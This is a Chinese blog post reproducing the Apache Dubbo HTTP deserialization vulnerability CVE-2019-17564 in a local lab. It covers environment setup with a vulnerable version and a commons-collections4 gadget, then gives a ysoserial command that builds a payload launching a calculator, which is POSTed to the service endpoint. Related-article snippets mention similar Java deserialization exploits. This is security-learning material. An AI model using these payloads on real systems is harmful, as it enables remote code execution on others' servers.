反序列化漏洞_Dubbo反序列化漏洞复现分析

最新推荐文章于 2024-08-11 21:12:10 发布
最新推荐文章于 2024-08-11 21:12:10 发布
阅读量269 收藏
点赞数
文章标签: 反序列化漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39607837/article/details/111334098
版权

1.Dubbo框架简介

Dubbo 是⼀个⾼性能服务框架,致⼒于提供⾼性能和透明化的RPC远程服务调⽤⽅案,以及SOA服务治理⽅案,使得应⽤可通过⾼性能RPC实现服务的输出和输⼊功能,和Spring框架可以⽆缝集成。 作为⼀个分布式服务框架,以及SOA治理⽅案,Dubbo其功能主要包括: 1.⾼性能NIO通讯及多协议集 2.成 服务动态寻址与路由 3.软负载均衡与容错 4.依赖分析与服务降级 具体看这篇⽂章: https://www.jianshu.com /p/0daf78e14dcf

2.CVE-2019-17564

1.漏洞简介

Apache Dubbo⽀持多种协议,推荐官⽅使⽤Dubbo协议。Apache Dubbo HTTP协议中的⼀个反序

列化漏洞(CVE-2019-17564),漏洞该主要原因的在于当Apache Dubbo启⽤HTTP协议之后,Apache Dubbo对HTTP数据处理不当:对数据编码、序列化、反序列化,利⽤Spring HTTP Invoker框架处理,未经任何检查直接反序列化数据,当项⽬包中存在可⽤的gadgets时即可导致远程代码执⾏。

2.影响范围

2.7.0 <= Apache Dubbo <= 2.7.4.1 

2.6.0 <= Apache Dubbo <= 2.6.7 

Apache Dubbo = 2.5.x

3.环境搭建

dubbo-dem o: https://github.com /apache/dubbo-sam ples/tree/m aster/java/dubbo-sam ples-http ⽤idea打开后,需要修改 pom. x ml ⽂件中的 version>,将版本改为存在漏洞的2. 7. 3

f5243b1177502a4699463f9a646849f7.png

  我们再往⾥⾯添加本地触发gadgets,这⾥导⼊commons-collections4-4.0恶意类依赖。

<dependency><groupId>org.apache.commonsgroupId><artifactId>commons-collections4artifactId> <version>4.0version>dependency> 
由于dubbo启动还依赖zookeeper,因此我们还需要安装zookeeper https://apache.website-solution.net/zookeeper/zookeeper-3.6.2/apache-zookeeper-3.6.2-bin.tar.g z 运⾏zookeeper之前,我们还需要修改⼀些配置⽂件: 将zookeeper的conf⽬录下的zoo_sam ple.cfg⽂件改成zoo.cfg并修改其中的两个参数

b7e6345b16fbb3ffe26c19048c335bf7.png 

然后 c d 到 z ook eeper 的 bi n ⽬录下 . / z k Ser v er . s h  s t ar t 启动zookeeper 随后启动 dubbo 项⽬中的 HttpProvider 出现下图红框中的提⽰,则证明环境搭建成功。

95c0e9ab6175b8983da71884f6f4f1c6.png

4. 漏洞复现

我们⾸先⽤yso 来⽣成⼀个序列化的payload:

java-jarysoserial-0.0.6-SNAPSHOT-all.jarCommonsCollections4"deepin-calculator">/tmp/payload.ser

而后⽤postman往

http://192.168.199.246:8090/org.apache.dubbo.samples.http.api.DemoService

POST我们⽣成的

payload.ser

79077c664ca9ad01f20c3cf91f5a34f9.png

weixin_39607837
关注
Aapche Dubbo 反序列化漏洞复现(CVE-2019-17564)
0xSec
12-24 852
Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。
Java RMI Registry 反序列化漏洞复现(<jdk8u232_b09)
0xSec
02-20 1160
Java Remote Method Invocation 用于在Java中进行远程调用。RMI存在远程bind的功能(虽然大多数情况不允许远程bind),在bind过程中,伪造Registry接收到的序列化数据(实现了Remote接口或动态代理了实现了Remote接口的对象),使Registry在对数据进行反序列化时触发相应的利用链(环境用的是commons-collections:3.2.1)。
Apache OFBiz rmi反序列化漏洞复现(CVE-2021-26295)
m0_48520508的博客
04-08 916
0x00简介 Apache OFBiz全称是The ApacheOpen For Business Project。是开放的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新的J2EE/XML规范和技术标准,构建大中型企业级、快平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz几乎实现了所有的J2EE核心设计模式,各个模块之间的耦合比较松散,用户能够比较容易的根据自己的需要进行拆卸,非常灵活。 0x01漏洞概述 2021年3月22日 Apache OFBiz官方发
RMI反序列漏洞复现-——手把手光速复现,工具超全
weixin_37771454的博客
03-24 3299
RMI反序列漏洞复现-手把手光速复现,工具超全一、靶机部署:二、本机怎样查看是不是可以回显?三、attackRMI利用 RMI是REMOTE METHOD INVOCATION的简称,是J2SE的一部分,能够让程序员开发出基于JAVA的分布式应用。一个RMI对象是一个远程JAVA对象,可以从另一个JAVA虚拟机上(甚至跨过网络)调用它的方法,可以像调用本地JAVA对象的方法一样调用远程对象的方法,...
漏洞复现-Apache Dubbo反序列化漏洞(CVE-2023-23638)
最新发布
玄道的网安博客
08-11 285
GenericFilter 将根据客户端提供的接口名、方法名、方法参数类型列表,根据反射机制获取对应的方法,再根据客户端提供的反序列化方式将参数进行反序列化成 pojo 对象。遍历 Map 中所有的 key, 并尝试获取与 key 对应的 setter 或 Field, 然后赋值因为上面的过程会同时获取可能的 setter 和 Field, 然后赋值, 所以我们基本上可以控制任何类的任何属性 (即使它没有对应的 setter)1、关闭对公网开放的Dubbo服务端端口,仅允许可信任的IP访问。
Aapche Dubbo Java反序列化漏洞复现
Shanfenglan's blog
12-13 1678
文章目录1. CVE-2019-17564原理利用 1. CVE-2019-17564 原理 Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。 影响版本:Apac
Apache Dubbo反序列化漏洞复现分析
include_voidmain的博客
03-10 3072
Apache Dubbo反序列化漏洞复现分析
Dubbo反序列化漏洞分析集合
AS011x的博客
09-09 3784
调用相应的反序列化函数对数据流进行反序列化操作。,如果不满足则直接抛出异常。若pojo为Map实例,则从pojo(也就是一开始的第三个参数)获取key为“class”的值,并通过反射得到class所对应的类type,再判断对象的类型进行下一步处理。在之前的分析中我们知道了这个方法是用来获取数据体中的一些信息用的,其中一种利用方式就是通过在读取version的时候,调用readUTF方法,跟进。主要是通过获取tag位,进行相应的处理,但是这里关键的就是,当这里不是一个String类型的时候,将会抛出异常。
Apache Dubbo 反序列化漏洞(CVE-2020-1948)
m0_46689007的博客
11-29 703
使用marshalsec开启ldap时,如果ldap服务和http服务上有日志,但时恶意命令没有执行,可以将"http://192.168.146.128#exp "改为"http://192.168.146.128/#exp"docker环境执行命令可能需要编码,如果ldap服务和http服务上有日志,但时恶意命令没有执行,将命令编码。看到ldap服务被访问,重定向到我们的http服务上的exp.class类。这一段是被攻击机访问攻击机的http服务上的恶意类exp.class。
CVE-2019-17564 Apache Dubbo Http 反序列化漏洞深入分析 .pdf
09-05
一旦配置完成,启动Dubbo服务,攻击者就可以通过构造特定的POST请求,利用这个反序列化漏洞。 针对此类安全问题,企业应当重视安全测试和安全建设,特别是金融和网络信息安全领域。定期进行渗透测试,监控和修复...
javaRMI反序列化漏洞验证工具
08-21
检测javaRMI反序列化漏洞
Aapche Dubbo Java反序列化漏洞(CVE-2019-17564)漏洞复现
weixin_48413667的博客
09-14 1383
一、软件介绍 Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。 二、漏洞描述 Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。 三、影响范围 Apache Dubbo ...
rmi 反序列化漏洞_java反序列化漏洞—被低估的破坏之王
weixin_39788256的博客
12-31 184
【IT168资讯】IT168资讯】近日,2015年最为被低估的,具有巨大破坏力的漏洞浮出水面。在FoxGlove Security安全团队的@breenmachine 发布一篇博客中介绍了该漏洞在最新版的WebLogic、WebSphere、JBoss、Jenkins、OpenNMS中的应用,实现远程代码执行。更为严重的是,在漏洞被发现的9个月后依然没有有效的java库补丁来针对受到影响的产品...
java获取远程服务器的目录_【漏洞复现】 CVE201914540远程代码执行漏洞分析&复现...
weixin_39933026的博客
11-30 708
0x00 前言从2017年3月15日,fastjson官方主动爆出框架存在远程代码执行高危安全漏洞以后,好像fastjson库漏洞频出。正好最近又爆出了个CVE-2019-14540,影响jackson,同时也影响fastjson,漏洞原理都是利用反序列化造成RCE,所以借此分析CVE-2019-14540的同时好好学习一下相关知识。0x01 影响范围fastjson影响版本:vers...
rmi 反序列化漏洞_RMI反序列化漏洞分析
weixin_33800074的博客
01-05 625
原创:Xman21合天智汇原创投稿活动:http://link.zhihu.com/?target=https%3A//mp.weixin.qq.com/s/Nw2VDyvCpPt_GG5YKTQuUQ一、RMI简介首先看一下RMI在wikipedia上的描述:Java远程方法调用,即Java RMI(Java Remote Method Invocation)是Java编程语言里,一种用于实现远...
rmi反序列化导致rce漏洞修复_烽火狼烟丨Apache Dubbo反序列化漏洞(CVE201917564)漏洞分析...
weixin_31414515的博客
12-30 339
点击上方“盛邦安全WebRAY”可以订阅漏洞描述Apache Dubbo是一款高性能、轻量级的开源java Rpc分布式服务框架。Dubbo提供面向接口的远程过程调用、集群容错和负载均衡、服务自动注册与发现这三大主要功能。(Apache Dubbo详细介绍:http://dubbo.apache.org/en-us/index.html)当Apache Dubbo启用HTTP协议之后,攻...
Java安全之Dubbo反序列化漏洞分析
m0_65462541的博客
12-21 2203
0x00 前言 最近天气冷,懒癌又犯了,加上各种项目使得本篇文断断续续。 0x01 Dubbo Dubbo是阿里巴巴开源的基于 Java 的高性能 RPC(一种远程调用) 分布式服务框架(SOA),致力于提供高性能和透明化的RPC远程服务调用方案,以及SOA服务治理方案。dubbo 支持多种序列化方式并且序列化是和协议相对应的。比如:Dubbo支持dubbo、rmi、hessian、http、webservice、thrift、redis等多种协议。 运行机制 Dubbo框架启动,容器Contai
rmi 反序列化漏洞_CVE201917564 Apache Dubbo 反序列化漏洞安全通告
weixin_36277690的博客
01-07 262
【背景】2020年2月10号,Apache Dubbo反序列化漏洞(CVE-2019-17564)被公布,使用 Dubbo-Rpc-Http (2.7.3 or lower) 和Spring-Web (5.1.9.RELEASE or lower)的版本可被利用。Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容...
fastjson反序列化漏洞_Fastjson反序列化漏洞的检测和利用
05-21
1. 利用Fastjson反序列化漏洞执行远程命令:黑客可以构造一个恶意JSON字符串,通过Fastjson反序列化漏洞实现远程命令执行。 2. 利用Fastjson反序列化漏洞实现文件读取:黑客可以构造一个恶意JSON字符串,通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值